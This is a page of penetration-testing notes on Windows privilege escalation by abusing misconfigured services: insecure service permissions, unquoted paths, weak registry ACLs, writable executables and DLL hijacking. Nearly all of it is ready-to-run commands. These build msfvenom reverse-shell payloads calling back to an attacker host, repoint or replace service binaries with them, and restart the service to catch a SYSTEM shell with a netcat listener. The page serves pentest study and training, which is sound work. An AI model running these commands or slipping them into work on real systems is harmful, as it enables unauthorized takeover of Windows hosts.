> For the complete documentation index, see [llms.txt](https://n3mosec.gitbook.io/pentest-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://n3mosec.gitbook.io/pentest-notes/notes/methodologies-and-tools/privilege-escalation/windows/service-exploits.md).

# Service Exploits

**NB: You have to be able to start/stop a service to exploit**

```
.\accesscheck /accepteula -uvqc $SERVICE
```

&#x20;

### Insecure Service Properties

* Find the vulnerable service

```
.\winPEASany.exe quiet servicesinfo
```

* Confirm access to the service

```
.\accesschck.exe /accepteula -uqvwc $USER $SERVICE
```

* Check configuration

```
sc qc $SERVICE
```

* Check service state

```
sc query $SERVICE
```

* Payload

```
msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$PORT -f exe -o rev.exe
```

* Set service path to location of shell on victim

```
sc config $SERVICE binpath= "\"C:\Users\$User\Desktop\rev.exe""
```

* Start nc listener
* Restart the service

&#x20;

### Unquoted Service Paths

* Useful when ability to write to the directory is present but can't overwrite files in the main directory
* Abuses the way Windows looks for executable, for example
  * C:\Program Files\Service\Cool Service\svc.exe
    * C:\Program.exe
    * C:\Program Files\Service.exe
    * C:\Program FIles\Service\Cool.exe
* Create an executable named appropriately and place in appropriate directory
* Find vulnerability

```
.\winPEASany.exe quiet servicesinfo
```

* Or use wmic

```
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
```

* You need
  * &#x20;Path to .exe that does not contain quotes
  * Write permissions to any prior folder in the tree
* Confirm service access for your user

```
.\accesscheck /accepteula -uvqc $USER $SERVICE
```

* Check write permission to existing binary paths

```
.\accesschck.exe /accepteula -uwdq "C:\" 
.\accesschck.exe /accepteula -uwdq "C:\Program Files\" 
.\accesschck.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
```

* If you have a writeable directory, name the reverse shell payload the $FolderName.exe
* Put it in the directory
* Start nc listener
* Restart the service

&#x20;

#### Weak Registry Permissions

* If ACL on a registry object is misconfigured, we could modify it even if we can't from the system normally
* winpeas will find all of these
* Verify

```
Get-ACL HKLM:\System\CurrentControlSet\Service\regsvc | Format-List
```

or

```
.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
```

* Check if you have permission to start and stop the service

```
.\accesschk.exe /accepteula -ucqv $USER regsvc
```

* Check the registry values for services

```
reg query HKLM\System\CurrentControlSet\Services\regsvc
```

* With permissions this can be overwritten and made to point to rev.exe payload

```
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\path\to\revshell.exe /f
```

* Start nc listener
* Restart the service

&#x20;

#### Insecure Service Executables

* If the .exe itself can be modified, can just replace it with our own msfvenom payload, renamed

```
.\winPEASany.exe quiet servicesinfo
```

* Validate access

```
.\accesschk.exe /accepteula -uwq "C:\Program Files\File Permissions Service\$service.exe"
```

* Confirm access to start/stop

```
.\accesschk.exe /accepteula -ucqv $user $service
```

* Backup or rename original .exe

```
move "C:\Program Files\File Permissions Service\$service.exe" servce.exe.bak
```

* Overwrite or replace the backed-up .exe

```
copy /Y C:\path\to\rev.exe "C:\Program Files\File Permissions Service\$service.exe"
```

* Start nc listener
* Restart the service

&#x20;

#### DLL Hijacking

* Some programs require libraries loaded (DLLS)
* If it contains an absolute path, or if the DLL is missing, and we have write access to the directory, we can essentially do the same as replacing the .exe itself to exploit
* winpeas usually finds these
* Check access to start/stop

```
.\accesschk.exe /accepteula -ucqv $user $dllsvc
```

* Check the service

```
sc qc dllsvc
```

* To be very sure, you can copy the service to a VM and check it with procmon to ensure the PATH, however, running the .exe from the location where the dll is located is usually enough. If you have GUI access it's easier to sus this out locally
* Create a dll reverse shell

```
msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f dll -o reverse.dll
```

* Copy into the folder with the path
* Stop and start the service

```
net stop $dllsvc net start $dllsvc
```
